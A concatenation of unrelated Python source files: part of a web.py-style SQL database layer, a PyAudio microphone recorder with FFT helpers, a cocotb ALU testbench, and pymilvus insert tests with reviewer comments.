    'INSERT INTO foo (age, name, created) VALUES (%s, %s, NOW())'
    >>> q.values()
    [2, 'bob']
    """
    def q(x):
        # Wrap a fragment in parentheses.
        return "(" + x + ")"
    if values:
        # keys() and values() of the same dict iterate in matching order,
        # so columns and parameters stay aligned.
        _keys = SQLQuery.join(values.keys(), ', ')
        _values = SQLQuery.join([sqlparam(v)
                                 for v in values.values()], ', ')
        sql_query = "INSERT INTO %s " % tablename + \
            q(_keys) + ' VALUES ' + q(_values)
    else:
        # No columns given: use the backend-specific "all defaults" form.
        sql_query = SQLQuery(
            self._get_insert_default_values_query(tablename))
    if _test:
        return sql_query
    db_cursor = self._db_cursor()
    if seqname is not False:
        # Let the backend append/replace the query to fetch the new row id.
        sql_query = self._process_insert_query(
            sql_query, tablename, seqname)
    if isinstance(sql_query, tuple):
        # for some databases, a separate query has to be made to find
        # the id of the inserted row.
        q1, q2 = sql_query
        self._db_execute(db_cursor, q1)
        self._db_execute(db_cursor, q2)
    else:
        self._db_execute(db_cursor, sql_query)
    try:
        out = db_cursor.fetchone()[0]
    except Exception:
        # Backend returned no id row (e.g. seqname=False); report None.
        out = None
    if not self.ctx.transactions:
        self.ctx.commit()
    return out
def _get_insert_default_values_query(self, table):
    # Standard-SQL form for inserting a row of all default values;
    # backends with different syntax (e.g. MySQL) override this.
    return "INSERT INTO %s DEFAULT VALUES" % table
def multiple_insert(self, tablename, values, seqname=None, _test=False):
    """
    Inserts multiple rows into `tablename`. The `values` must be a list of
    dictionaries, one for each row to be inserted, each with the same set
    of keys. Returns the list of ids of the inserted rows.
    Set `seqname` to the ID if it's not the default, or to `False`
    if there isn't one.
    >>> db = DB(None, {})
    >>> db.supports_multiple_insert = True
    >>> values = [{"name": "foo", "email": "foo@example.com"}, {"name": "bar", "email": "bar@example.com"}]
    >>> db.multiple_insert('person', values=values, _test=True)
    <sql: "INSERT INTO person (name, email) VALUES ('foo', 'foo@example.com'), ('bar', 'bar@example.com')">
    """
    if not values:
        # Nothing to insert.
        return []
    if not self.supports_multiple_insert:
        # Fall back to one INSERT per row for backends without
        # multi-row VALUES support.
        out = [self.insert(tablename, seqname=seqname, _test=_test, **v)
               for v in values]
        if seqname is False:
            return None
        else:
            return out
    keys = list(values[0].keys())
    # Compare key *sets*: the original `v.keys() != keys` check was
    # order-dependent, rejecting rows whose dicts happen to iterate
    # their (identical) keys in a different order.
    expected_keys = set(keys)
    for v in values:
        if set(v.keys()) != expected_keys:
            raise ValueError('Not all rows have the same keys')
    sql_query = SQLQuery('INSERT INTO %s (%s) VALUES ' % (
        tablename, ', '.join(keys)))
    for i, row in enumerate(values):
        if i != 0:
            sql_query.append(", ")
        # Append "(v1, v2, ...)" for this row directly onto sql_query.
        SQLQuery.join([SQLParam(row[k]) for k in keys],
                      sep=", ", target=sql_query, prefix="(", suffix=")")
    if _test:
        return sql_query
    db_cursor = self._db_cursor()
    if seqname is not False:
        sql_query = self._process_insert_query(
            sql_query, tablename, seqname)
    if isinstance(sql_query, tuple):
        # for some databases, a separate query has to be made to find
        # the id of the inserted row.
        q1, q2 = sql_query
        self._db_execute(db_cursor, q1)
        self._db_execute(db_cursor, q2)
    else:
        self._db_execute(db_cursor, sql_query)
    try:
        out = db_cursor.fetchone()[0]
        # The backend reports the id of the *last* row; reconstruct the
        # contiguous id range of all inserted rows.
        out = range(out - len(values) + 1, out + 1)
    except Exception:
        out = None
    if not self.ctx.transactions:
        self.ctx.commit()
    return out
def update(self, tables, where, vars=None, _test=False, **values):
    """
    Update `tables` with clause `where` (interpolated using `vars`)
    and setting `values`.
    >>> db = DB(None, {})
    >>> name = 'Joseph'
    >>> q = db.update('foo', where='name = $name', name='bob', age=2,
    ...     created=SQLLiteral('NOW()'), vars=locals(), _test=True)
    >>> q
    <sql: "UPDATE foo SET age = 2, name = 'bob', created = NOW() WHERE name = 'Joseph'">
    >>> q.query()
    'UPDATE foo SET age = %s, name = %s, created = NOW() WHERE name = %s'
    >>> q.values()
    [2, 'bob', 'Joseph']
    """
    if vars is None:
        vars = {}
    # Normalize `where` (string/int/SQLQuery) into a SQLQuery fragment.
    where = self._where(where, vars)
    query = (
        "UPDATE " + sqllist(tables) +
        " SET " + sqlwhere(values, ', ') +
        " WHERE " + where)
    if _test:
        return query
    db_cursor = self._db_cursor()
    self._db_execute(db_cursor, query)
    if not self.ctx.transactions:
        # Auto-commit when no explicit transaction is active.
        self.ctx.commit()
    # Number of rows affected by the UPDATE.
    return db_cursor.rowcount
def delete(self, table, where, using=None, vars=None, _test=False):
    """
    Deletes from `table` with clauses `where` and `using`.
    >>> db = DB(None, {})
    >>> name = 'Joe'
    >>> db.delete('foo', where='name = $name', vars=locals(), _test=True)
    <sql: "DELETE FROM foo WHERE name = 'Joe'">
    """
    if vars is None:
        vars = {}
    # Normalize `where` (string/int/SQLQuery) into a SQLQuery fragment.
    where = self._where(where, vars)
    q = 'DELETE FROM ' + table
    if using:
        # USING joins additional tables into the DELETE (PostgreSQL-style).
        q += ' USING ' + sqllist(using)
    if where:
        q += ' WHERE ' + where
    if _test:
        return q
    db_cursor = self._db_cursor()
    self._db_execute(db_cursor, q)
    if not self.ctx.transactions:
        self.ctx.commit()
    # Number of rows deleted.
    return db_cursor.rowcount
def _process_insert_query(self, query, tablename, seqname):
    # Default: no post-processing. Backends override this to return a
    # (insert_query, fetch_id_query) tuple (see MySQLDB / SqliteDB).
    return query
def transaction(self):
    """Start a transaction."""
    # Returns a Transaction bound to this connection's context; while any
    # transaction is active, query/insert/update skip auto-commit.
    return Transaction(self.ctx)
class MySQLDB(DB):
    # DB backend for MySQL via the MySQLdb driver.
    def __init__(self, **keywords):
        import MySQLdb as db
        # Translate web.py's `pw` keyword to MySQLdb's `passwd`.
        if 'pw' in keywords:
            keywords['passwd'] = keywords['pw']
            del keywords['pw']
        # Default to utf8; pass charset=None to let the driver decide.
        if 'charset' not in keywords:
            keywords['charset'] = 'utf8'
        elif keywords['charset'] is None:
            del keywords['charset']
        self.paramstyle = db.paramstyle = 'pyformat'  # it's both, like psycopg
        self.dbname = "mysql"
        DB.__init__(self, db, keywords)
        # MySQL supports multi-row "INSERT ... VALUES (...), (...)".
        self.supports_multiple_insert = True
    def _process_insert_query(self, query, tablename, seqname):
        # MySQL needs a follow-up query to fetch the auto-increment id.
        return query, SQLQuery('SELECT last_insert_id();')
    def _get_insert_default_values_query(self, table):
        # MySQL has no DEFAULT VALUES syntax; use empty column/value lists.
        return "INSERT INTO %s () VALUES()" % table
def import_driver(drivers, preferred=None):
    """Import the first available driver or preferred driver.
    """
    # When a preferred driver is named, try only that one.
    candidates = [preferred] if preferred else drivers
    for name in candidates:
        try:
            return __import__(name, None, None, ['x'])
        except ImportError:
            continue
    raise ImportError("Unable to import " + " or ".join(candidates))
class SqliteDB(DB):
    # DB backend for SQLite; picks the first importable driver module.
    def __init__(self, **keywords):
        db = import_driver(["sqlite3", "pysqlite2.dbapi2",
                            "sqlite"], preferred=keywords.pop('driver', None))
        if db.__name__ in ["sqlite3", "pysqlite2.dbapi2"]:
            db.paramstyle = 'qmark'
            # sqlite driver doesn't create datetime objects for timestamp
            # columns unless the `detect_types` option is passed. It seems to
            # be supported in sqlite3 and pysqlite2 drivers; not sure about
            # the legacy `sqlite` driver.
            keywords.setdefault('detect_types', db.PARSE_DECLTYPES)
        self.paramstyle = db.paramstyle
        # web.py uses `db`; the driver expects `database`.
        keywords['database'] = keywords.pop('db')
        keywords[
            'pooling'] = False  # sqlite doesn't allow connections to be shared by threads
        self.dbname = "sqlite"
        DB.__init__(self, db, keywords)
    def _process_insert_query(self, query, tablename, seqname):
        # Follow-up query to fetch the rowid of the inserted row.
        return query, SQLQuery('SELECT last_insert_rowid();')
    def query(self, *a, **kw):
        out = DB.query(self, *a, **kw)
        if isinstance(out, iterbetter):
            # sqlite's cursor.rowcount is -1 for SELECTs, so the __len__
            # DB.query attached would be wrong; remove it.
            del out.__len__
        return out
def dburl2dict(url):
    """
    Takes a URL to a database and parses it into an equivalent dictionary.
    >>> dburl2dict('postgres://james:day@serverfarm.example.net:5432/mygreatdb') == \\
    ...     {'pw': 'day', 'dbn': 'postgres', 'db': 'mygreatdb', 'host': 'serverfarm.example.net', 'user': 'james', 'port': '5432'}
    True
    >>> dburl2dict('postgres://james:d%40y@serverfarm.example.net/mygreatdb')['pw']
    'd@y'
    """
    dbn, rest = url.split('://', 1)
    # Credentials come before '@'; %-escapes let them contain ':'/'@'.
    user, rest = rest.split(':', 1)
    pw, rest = rest.split('@', 1)
    if ':' in rest:
        host, rest = rest.split(':', 1)
        port, rest = rest.split('/', 1)
    else:
        host, rest = rest.split('/', 1)
        port = None
    db = rest
    # unquote moved from `urllib` (Python 2) to `urllib.parse` (Python 3).
    try:
        from urllib import unquote as uq
    except ImportError:
        from urllib.parse import unquote as uq
    out = dict(dbn=dbn, user=uq(user), pw=uq(pw), host=uq(host), db=uq(db))
    if port:
        # Note: the port is returned as a string and is not unquoted.
        out['port'] = port
    return out
_databases = {}
def database(dburl=None, **params):
    """Creates appropriate database using params.
    Pooling will be enabled if DBUtils module is available.
    Pooling can be disabled by passing pooling=False in params.
    """
    # With neither a URL nor params, fall back to the environment.
    if not dburl and not params:
        dburl = os.environ['DATABASE_URL']
    if dburl:
        params = dburl2dict(dburl)
    dbn = params.pop('dbn')
    if dbn not in _databases:
        raise UnknownDB(dbn)
    return _databases[dbn](**params)
def register_database(name, clazz):
    """
    Register a database.
    >>> class LegacyDB(DB):
    ...     def __init__(self, **params):
    ...         pass
    ...
    >>> register_database('legacy', LegacyDB)
    >>> db = database(dbn='legacy', db='test', user='joe', passwd='secret')
    """
    # Make `clazz` constructible via database(dbn=name, ...).
    _databases[name] = clazz
# Register the built-in backends so database(dbn=...) can find them.
register_database('mysql', MySQLDB)
register_database('sqlite', SqliteDB)
def _interpolate(format):
    """
    Takes a format string and returns a list of 2-tuples of the form
    (boolean, string) where boolean says whether string should be evaled
    or not.
    from <http://lfw.org/python/Itpl.py> (public domain, Ka-Ping Yee)
    """
    # NOTE(review): tokenize.tokenprog is a Python-2-only internal regex;
    # it does not exist on Python 3 — confirm this path is py2-only.
    from tokenize import tokenprog
    def matchorfail(text, pos):
        # Match one Python token at `pos` or raise a parse error.
        match = tokenprog.match(text, pos)
        if match is None:
            raise _ItplError(text, pos)
        return match, match.end()
    namechars = "abcdefghijklmnopqrstuvwxyz"\
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    chunks = []
    pos = 0
    while True:
        # Scan for the next '$' marker; everything before it is literal.
        dollar = format.find("$", pos)
        if dollar < 0:
            break
        nextchar = format[dollar + 1]
        if nextchar == "{":
            # ${expr}: consume tokens until braces balance.
            chunks.append((0, format[pos:dollar]))
            pos, level = dollar + 2, 1
            while level:
                match, pos = matchorfail(format, pos)
                tstart, tend = match.regs[3]
                token = format[tstart:tend]
                if token == "{":
                    level = level + 1
                elif token == "}":
                    level = level - 1
            chunks.append((1, format[dollar + 2:pos - 1]))
        elif nextchar in namechars:
            # $name, optionally followed by .attr chains and (...)/[...] calls.
            chunks.append((0, format[pos:dollar]))
            match, pos = matchorfail(format, dollar + 1)
            while pos < len(format):
                if format[pos] == "." and\
                        pos + 1 < len(format) and format[pos + 1] in namechars:
                    match, pos = matchorfail(format, pos + 1)
                elif format[pos] in "([":
                    # Consume a balanced call/index expression.
                    pos, level = pos + 1, 1
                    while level:
                        match, pos = matchorfail(format, pos)
                        tstart, tend = match.regs[3]
                        token = format[tstart:tend]
                        if token[0] in "([":
                            level = level + 1
                        elif token[0] in ")]":
                            level = level - 1
                else:
                    break
            chunks.append((1, format[dollar + 1:pos]))
        else:
            # Lone '$' (or '$$' escape): emit it literally.
            chunks.append((0, format[pos:dollar + 1]))
            pos = dollar + 1 + (nextchar == "$")
    if pos < len(format):
        chunks.append((0, format[pos:]))
    return chunks
if __name__ == "__main__":
    # Run the embedded doctests when executed as a script.
    import doctest
    doctest.testmod()
|
recorder.py | import matplotlib
matplotlib.use('TkAgg') # <-- THIS MAKES IT FAST!
import numpy
import scipy
import struct
import pyaudio
import threading
import pylab
import struct
class SwhRecorder:
    """Simple, cross-platform class to record from the microphone."""
    def __init__(self):
        """minimal garb is executed when class is loaded."""
        self.RATE = 48100          # sample rate in Hz
        self.BUFFERSIZE = 2 ** 12  # 1024 is a good buffer size
        self.secToRecord = .1      # seconds captured per record() pass
        self.threadsDieNow = False # set True to stop the background thread
        self.newAudio = False      # flag: fresh data available in self.audio
    def setup(self):
        """initialize sound card."""
        # TODO - windows detection vs. alsa or something for linux
        # TODO - try/except for sound card selection/initiation
        self.buffersToRecord = int(self.RATE * self.secToRecord / self.BUFFERSIZE)
        if self.buffersToRecord == 0:
            self.buffersToRecord = 1
        self.samplesToRecord = int(self.BUFFERSIZE * self.buffersToRecord)
        self.chunksToRecord = int(self.samplesToRecord / self.BUFFERSIZE)
        self.secPerPoint = 1.0 / self.RATE
        self.p = pyaudio.PyAudio()
        self.inStream = self.p.open(format=pyaudio.paInt16, channels=1,
                                    rate=self.RATE, input=True,
                                    frames_per_buffer=self.BUFFERSIZE)
        # Time axes for one buffer and for the whole recording window.
        self.xsBuffer = numpy.arange(self.BUFFERSIZE) * self.secPerPoint
        self.xs = numpy.arange(self.chunksToRecord * self.BUFFERSIZE) * self.secPerPoint
        self.audio = numpy.empty((self.chunksToRecord * self.BUFFERSIZE),
                                 dtype=numpy.int16)
    def close(self):
        """cleanly back out and release sound card."""
        self.p.close(self.inStream)
    ### RECORDING AUDIO ###
    def getAudio(self):
        """get a single buffer size worth of audio."""
        audioString = self.inStream.read(self.BUFFERSIZE)
        # frombuffer replaces numpy.fromstring, which is deprecated/removed.
        return numpy.frombuffer(audioString, dtype=numpy.int16)
    def record(self, forever=True):
        """record secToRecord seconds of audio."""
        while True:
            if self.threadsDieNow:
                break
            for i in range(self.chunksToRecord):
                self.audio[i * self.BUFFERSIZE:(i + 1) * self.BUFFERSIZE] = \
                    self.getAudio()
            self.newAudio = True
            if forever == False:
                break
    def continuousStart(self):
        """CALL THIS to start running forever."""
        self.t = threading.Thread(target=self.record)
        self.t.start()
    def continuousEnd(self):
        """shut down continuous recording."""
        self.threadsDieNow = True
    ### MATH ###
    def downsample(self, data, mult):
        """Given 1D data, return the binned average."""
        overhang = len(data) % mult
        if overhang:
            data = data[:-overhang]
        # Floor division: len(data)/mult is a float on Python 3 and
        # numpy.reshape rejects non-integer dimensions.
        data = numpy.reshape(data, (len(data) // mult, mult))
        data = numpy.average(data, 1)
        return data
    def fft(self, data=None, trimBy=10, logScale=False, divBy=100):
        """Return (xs, ys): folded magnitude spectrum of `data`
        (defaults to the last recorded audio)."""
        # `is None` instead of `== None`: comparing an ndarray with ==
        # broadcasts elementwise and raises in a boolean context.
        if data is None:
            data = self.audio.flatten()
        left, right = numpy.split(numpy.abs(numpy.fft.fft(data)), 2)
        # Fold the negative-frequency half onto the positive half.
        ys = numpy.add(left, right[::-1])
        if logScale:
            ys = numpy.multiply(20, numpy.log10(ys))
        xs = numpy.arange(self.BUFFERSIZE / 2, dtype=float)
        if trimBy:
            i = int((self.BUFFERSIZE / 2) / trimBy)
            ys = ys[:i]
            xs = xs[:i] * self.RATE / self.BUFFERSIZE
        if divBy:
            ys = ys / float(divBy)
        return xs, ys
    ### VISUALIZATION ###
    def plotAudio(self):
        """open a matplotlib popup window showing audio data."""
        pylab.plot(self.audio.flatten())
        pylab.show()
|
dut_cocotb.py | import cocotb
import test_sw
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge, FallingEdge
from queue import Queue, Empty
import tester
import threading
class CocoTBBFM():
    # Bus functional model bridging a thread-based tester to the cocotb DUT.
    def __init__(self, dut):
        self.dut = dut
        # maxsize=1 makes the producer block until the driver consumes
        # each number, providing back-pressure from the simulator side.
        self.queue = Queue(maxsize=1)
        print(f"made queue {self.queue}")
        # NOTE(review): this Event attribute shadows the `done` method
        # defined below — `bfm.done()` will try to call the Event, not
        # the method. Confirm which API is intended.
        self.done = cocotb.triggers.Event(name="Done")
    def send_num(self, num):
        # Called from the tester thread; blocks while the queue is full.
        print(f"in: {num} to {self.queue}")
        self.queue.put(num)
    async def start(self):
        # Drive data_in with the next queued number on each rising edge.
        while True:
            await RisingEdge(self.dut.clk)
            try:
                print(f"trying to get from {self.queue}")
                # NOTE(review): queue.Queue.get() is synchronous and not
                # awaitable — `await` on its return value should raise
                # TypeError, and a blocking get() would stall the event
                # loop. Empty is only raised by get_nowait(). Verify this
                # coroutine behaves as intended under cocotb.
                numb = await self.queue.get()
                print(f"got: {numb}")
                self.dut.data_in = numb
            except Empty:
                print("not_there")
                pass
    async def reset(self):
        # Hold reset_n low across one falling edge, release it, then wait
        # for a rising edge so the DUT starts from a clean state.
        await FallingEdge(self.dut.clk)
        self.dut.reset_n = 0
        await FallingEdge(self.dut.clk)
        self.dut.reset_n = 1
        await RisingEdge(self.dut.clk)
    def done(self):
        # NOTE(review): unreachable on instances — the `self.done` Event
        # assigned in __init__ shadows this method; consider renaming one.
        self.done.set()
def run_test(test):
    # Thin wrapper so the tester can be used as a threading.Thread target.
    tester.Tester.run_test(test)
@cocotb.test()
async def test_alu(dut):
    # Start a free-running 2us clock for the DUT.
    clock = Clock(dut.clk, 2, units="us")
    cocotb.fork(clock.start())
    bfm = CocoTBBFM(dut)
    stim = test_sw.Stim(5, dut, bfm)
    # Reset the DUT before starting the driver coroutine.
    await bfm.reset()
    cocotb.fork(bfm.start())
    # Run the software-side stimulus in a separate OS thread; it feeds
    # numbers to the BFM queue while the simulator consumes them.
    tt = threading.Thread(target=run_test, args=(stim.numb_gen_test,),
                          name="Run Thread")
    tt.start()
    # Wait until the stimulus signals completion via the Done event.
    await bfm.done.wait()
|
test_insert.py | import copy
import logging
import threading
import pytest
from pymilvus import DataType, ParamError, BaseException
from utils import utils as ut
from common.constants import default_entity, default_entities, default_binary_entity, default_binary_entities, \
default_fields
from common.common_type import CaseLabel
# Per-test timeout (seconds) for insert-related cases.
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = ut.default_float_vec_field_name
binary_field_name = ut.default_binary_vec_field_name
default_nb = ut.default_nb
row_count = ut.row_count
default_tag = ut.default_tag
# Minimal vector search request used to validate data after inserts.
default_single_query = {
    "data": ut.gen_vectors(1, ut.default_dim),
    "anns_field": ut.default_float_vec_field_name,
    "param": {"metric_type": "L2", "params": {"nprobe": 10}},
    "limit": 10,
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
    scope="function",
    params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
    # Parametrized index config; skip index types the CPU build can't run.
    if request.param["index_type"] in ut.index_cpu_not_support():
        pytest.skip("CPU not support index_type: ivf_sq8h")
    logging.getLogger().info(request.param)
    return request.param
@pytest.fixture(
    scope="function",
    params=ut.gen_single_filter_fields()
)
def get_filter_field(self, request):
    # One scalar (filterable) field schema per parametrization.
    yield request.param
@pytest.fixture(
    scope="function",
    params=ut.gen_single_vector_fields()
)
def get_vector_field(self, request):
    # One vector field schema per parametrization.
    yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_empty_entity(self, connect, collection):
    """
    target: test insert with empty entity list
    method: set empty entity list as insert method params
    expected: raises a ParamError exception
    """
    entities = []
    # An empty entity list must be rejected client-side with ParamError.
    with pytest.raises(ParamError) as e:
        connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_None(self, connect, collection):
    """
    target: test insert with None
    method: set None as insert method params
    expected: raises a ParamError
    """
    entity = None
    # NOTE(review): docstring says ParamError but the test accepts any
    # Exception — tighten to ParamError if the client guarantees it.
    with pytest.raises(Exception) as e:
        connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_collection_not_existed(self, connect):
    """
    target: test insert, with collection not existed
    method: insert entity into a random named collection
    expected: raise a BaseException
    """
    # Unique random name guarantees the collection does not exist.
    collection_name = ut.gen_unique_str(uid)
    with pytest.raises(BaseException) as e:
        connect.insert(collection_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
    """
    target: test insert entities without connection
    method: create collection and insert entities in it, check if inserted successfully
    expected: raise exception
    """
    # `dis_connect` is a disconnected client; any insert must fail.
    with pytest.raises(Exception) as e:
        dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
    """
    target: test delete collection after insert entities
    method: insert entities and drop collection
    expected: has_collection false
    """
    result = connect.insert(collection, default_entity)
    assert len(result.primary_keys) == 1
    connect.drop_collection(collection)
    # `assert not ...` instead of `== False`: idiomatic and equivalent
    # for the boolean returned by has_collection.
    assert not connect.has_collection(collection)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
    """
    target: test drop collection after insert entities for a while
    method: insert entities, flush, and delete collection
    expected: has_collection false
    """
    result = connect.insert(collection, default_entity)
    assert len(result.primary_keys) == 1
    # Flush persists the segment before the collection is dropped.
    connect.flush([collection])
    connect.drop_collection(collection)
    # `assert not ...` instead of `== False`: idiomatic and equivalent
    # for the boolean returned by has_collection.
    assert not connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
    """
    target: test building an index after inserting entities
    method: insert entities and build index
    expected: no error raised
    """
    result = connect.insert(collection, default_entities)
    assert len(result.primary_keys) == default_nb
    connect.flush([collection])
    connect.create_index(collection, field_name, get_simple_index)
    # FLAT collections report no index metadata, so only verify otherwise.
    if get_simple_index["index_type"] != "FLAT":
        index = connect.describe_index(collection, "")
        # presumably mutates get_simple_index into the expected shape — verify
        ut.create_target_index(get_simple_index, field_name)
        assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
    """
    target: test inserting entities after the index is built
    method: build index, then insert entities
    expected: no error raised
    """
    connect.create_index(collection, field_name, get_simple_index)
    result = connect.insert(collection, default_entities)
    assert len(result.primary_keys) == default_nb
    # FLAT collections report no index metadata, so only verify otherwise.
    if get_simple_index["index_type"] != "FLAT":
        index = connect.describe_index(collection, "")
        # presumably mutates get_simple_index into the expected shape — verify
        ut.create_target_index(get_simple_index, field_name)
        assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_search(self, connect, collection):
    """
    target: test search entity after insert entity after a while
    method: insert entity, flush, load, and search collection
    expected: no error raised
    """
    result = connect.insert(collection, default_entities)
    connect.flush([collection])
    # Collection must be loaded before it is searchable.
    connect.load_collection(collection)
    res = connect.search(collection, **default_single_query)
    assert len(res[0]) == ut.default_top_k
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_segment_row_count(self, connect, collection):
    # Disabled (leading underscore keeps pytest from collecting it):
    # inserting one row over the segment limit should split into 2 segments.
    nb = ut.default_segment_row_limit + 1
    result = connect.insert(collection, ut.gen_entities(nb))
    connect.flush([collection])
    assert len(result.primary_keys) == nb
    stats = connect.get_collection_stats(collection)
    assert len(stats['partitions'][0]['segments']) == 2
    for segment in stats['partitions'][0]['segments']:
        assert segment['row_count'] in [ut.default_segment_row_limit, 1]
@pytest.fixture(
    scope="function",
    params=[
        1,      # single-row insert
        2000    # bulk insert
    ],
)
def insert_count(self, request):
    yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
    """
    target: test insert entities in collection, use customize ids
    method: create collection and insert entities in it, check the ids returned and
            the collection length after entities inserted
    expected: the length of ids and the collection row count
    """
    nb = insert_count
    ids = [i for i in range(nb)]
    entities = ut.gen_entities(nb)
    # Field 0 holds the primary keys; override with explicit ids.
    entities[0]["values"] = ids
    result = connect.insert(id_collection, entities)
    connect.flush([id_collection])
    assert len(result.primary_keys) == nb
    assert result.primary_keys == ids
    stats = connect.get_collection_stats(id_collection)
    assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
    """
    target: test insert vectors in collection, use customize the same ids
    method: create collection and insert vectors in it, check the ids returned and
            the collection length after vectors inserted
    expected: the length of ids and the collection row count
    """
    nb = insert_count
    # Duplicate primary keys are accepted; every row gets id 1.
    ids = [1 for i in range(nb)]
    entities = ut.gen_entities(nb)
    entities[0]["values"] = ids
    result = connect.insert(id_collection, entities)
    connect.flush([id_collection])
    assert len(result.primary_keys) == nb
    assert result.primary_keys == ids
    stats = connect.get_collection_stats(id_collection)
    assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
    """
    target: test create normal collection with different fields, insert entities into id with ids
    method: create collection with diff fields: metric/field_type/..., insert, and count
    expected: row count correct
    """
    nb = 5
    filter_field = get_filter_field
    vector_field = get_vector_field
    collection_name = ut.gen_unique_str("test_collection")
    # auto_id=False so the explicit primary keys below are used.
    fields = {
        "fields": [ut.gen_primary_field(), filter_field, vector_field],
        "auto_id": False
    }
    connect.create_collection(collection_name, fields)
    ids = [i for i in range(nb)]
    entities = ut.gen_entities_by_fields(fields["fields"], nb, ut.default_dim, ids)
    logging.getLogger().info(entities)
    result = connect.insert(collection_name, entities)
    assert result.primary_keys == ids
    connect.flush([collection_name])
    stats = connect.get_collection_stats(collection_name)
    assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
    """
    target: test insert entities in collection without ids
    method: create id_collection and insert entities without
    expected: exception raised
    """
    nb = insert_count
    with pytest.raises(Exception) as e:
        entities = ut.gen_entities(nb)
        # Drop the primary-key field; an id_collection requires it.
        del entities[0]
        connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
    """
    target: check the result of insert, with params ids and no ids
    method: test insert vectors twice, use customize ids first, and then use no ids
    expected: BaseException raised
    """
    ids = [i for i in range(default_nb)]
    entities = copy.deepcopy(default_entities)
    entities[0]["values"] = ids
    connect.insert(id_collection, entities)
    with pytest.raises(Exception) as e:
        # Second insert omits the primary-key field -> must fail.
        del entities[0]
        connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
    """
    target: check the result of insert without ids
    method: insert entities into an id_collection with the id field removed
    expected: error raised
    """
    entities = copy.deepcopy(default_entities)
    # Remove the primary-key field before inserting.
    del entities[0]
    with pytest.raises(Exception) as e:
        connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
    """
    target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
    method: create collection and insert vectors in it
    expected: raise exception
    """
    # One id fewer than the number of entities.
    ids = [i for i in range(1, default_nb)]
    logging.getLogger().info(len(ids))
    entities = copy.deepcopy(default_entities)
    entities[0]["values"] = ids
    with pytest.raises(Exception) as e:
        connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
    """
    target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
    method: create collection and insert vectors in it
    expected: raise exception
    """
    # Many ids paired with a single entity -> length mismatch.
    ids = [i for i in range(1, default_nb)]
    logging.getLogger().info(len(ids))
    entity = copy.deepcopy(default_entity)
    entity[0]["values"] = ids
    with pytest.raises(Exception) as e:
        connect.insert(id_collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition(self, connect, collection):
    """
    target: test insert entities in collection created before
    method: create collection and insert entities in it, with the partition_name param
    expected: the collection row count equals to nq
    """
    connect.create_partition(collection, default_tag)
    result = connect.insert(collection, default_entities, partition_name=default_tag)
    assert len(result.primary_keys) == default_nb
    assert connect.has_partition(collection, default_tag)
    connect.flush([collection])
    # Row count is collection-wide, including rows in the partition.
    stats = connect.get_collection_stats(collection)
    assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
    """
    target: test insert entities in collection created before, insert with ids
    method: create collection and insert entities in it, with the partition_name param
    expected: the collection row count equals to nq
    """
    connect.create_partition(id_collection, default_tag)
    ids = [i for i in range(default_nb)]
    entities = ut.gen_entities(default_nb)
    entities[0]["values"] = ids
    result = connect.insert(id_collection, entities, partition_name=default_tag)
    assert result.primary_keys == ids
    # NOTE(review): docstring promises a row-count check, but none is
    # performed — consider asserting get_collection_stats here.
    logging.getLogger().info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_default_partition(self, connect, collection):
    """
    target: test insert entities into default partition
    method: create partition and insert info collection without tag params
    expected: the collection row count equals to nb
    """
    # Explicitly target the built-in default partition.
    result = connect.insert(collection, default_entities, partition_name=ut.default_partition_name)
